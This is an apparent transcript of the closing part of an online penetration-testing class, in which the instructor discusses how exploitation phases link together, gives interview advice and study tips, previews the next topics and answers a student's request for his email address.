No, today's concept was really interlinking the previous areas. Like usually we used to do the exploitation and sometimes we get stuck there, but what is the take advantages of exploit, post exploitations and moving laterally or vertically or taking advantages of minimal thing. Today's session was actually very useful to what is that interlink last 3 sessions.
Yes, very good, very good. So the core part is actually in the exploitation process and post-exploitation process and pre-exploitation process, right? If we are able to link them, then it will be really simple, right? So it is not as simple as what we see when we go through a recorded lecture, but it becomes really simple if you are able to solve it on your own. Even this is my goal, or the actual management goal, to make sure that you get that skill right so that you can easily crack interviews. Do remember, nowadays the interview pattern is not same like asking you multiple questions or something else. Especially if you are trying to look for a pen testing role, for sure you will be receiving a challenge, right? They will ask you to solve the challenge to know whether you are really skillful at that particular task or not. They may give you a simple cryptographic challenge, or they may give you a website and they will ask you on identify what is the vulnerability that is present and prepare a report for that, right? So one single example that I can give you is one of the students who actually applied for a job on so and so company. I don't want to mention the company name. They gave them a application named as WebGoat. WebGoat is a very popular vulnerable application, right? So they simply gave him that application and they wanted him to identify a vulnerability there. In fact, WebGoat is designed as a vulnerable application. It comes with tons of different vulnerabilities. So they want him just to identify one or two vulnerabilities and submit a report for that to proceed to the next level of interviewing, right? See, you can understand what they are looking for. Companies will always look for the actual core knowledge that you have, right? By testing whether you are able to apply them or not. They don't simply take you into the picture by simply knowing whether you are able to use burp suit or not, whether you are able to use Metasploit or not. These are not the questions that they will ask. They will test whether you are able to solve it or not. Same like programming related roles. So if you are a developer, if you want to work for Google or Facebook or Amazon, obviously they are going to test your problem solving skills. In case of pen testing, it is all about the methodology that you are going to follow, right? Anyhow, there is no standard methodology that everyone must follow, right? Each and everyone will have a different approach. That is what they are going to test. So you must not be an expert in an area. No one can be an expert in any of the areas. Even after working in a pen testing domain for around 20 years or 30 years, there may be areas where you are not that confident, or else there may be areas that you are using tools that can be simplified with something that is latest. There can be easy way in which you can actually approach that particular vulnerability, right? So that is why please make sure that you put at least half an hour time on daily basis, or else at least 1 hour time twice in a week or thrice in a week. That is more than enough, right? So take one single concept, understand it, and then move on to the next one. So I personally spent around 4 months of time, 4 to 5 months of dedicated time to practice and get through these concepts, even after training for hacking related concepts or EC Council certifications for around 10 plus years. Not because of not knowing the concept, but the approach that we build, it is like never ending process, right? So today we may have some kind of approach, but with new skills that you add, it becomes even more simple. So make sure that you give it the time that it require. For sure, it is damn simple to crack and acquire a role in the field of pen testing. With that thing said, my dear friends, please make sure that you can you download this HSV box from the LMS and practice this week. Next week, I will see you with the concepts of binary analysis, right? And IoT and OT. So there are very less practicals. Mostly we will be doing all these things right on the iLabs platform itself, right? And there are certain binary analysis related concepts that I will be explaining on my devices. With that thing said, that's all from my side for day 4. Anything else? Any questions that you have, please let me know. At any point of time, if you have queries, you can write me an email at james.b@cartelsoftware.com. Hello, are you all there?
Sure, sir.
Sir, can you just repeat your mail ID?
It is jayanth.b. Let me drop that in the chat. jayanth.b@cartelsoftware.com. No questions will relate with two scenarios. One, you actually understood everything. Two, zero went in. Anyhow, if you rewatch the recorded lectures, you may come up with few more questions. Because of the timing constraint, I was unable to give you more time on throwing questions at me, but it is not like that. You can write me email anytime. I'll be more than happy to help you out. All right. Okay, then. Thank you so much for joining me on this session, and I hope you all enjoyed the session. We'll see you all in day 5, one last day to wrap up this module. So please don't miss out on that particular module. With that thing said, that's all we have time for today. And I'll see you next week. This is Jayanth signing off. Tada. Bye-bye. See you.
Thank you, sir.
Thank you, sir.
Thank
Thank you, sir.
All right. Bye-bye.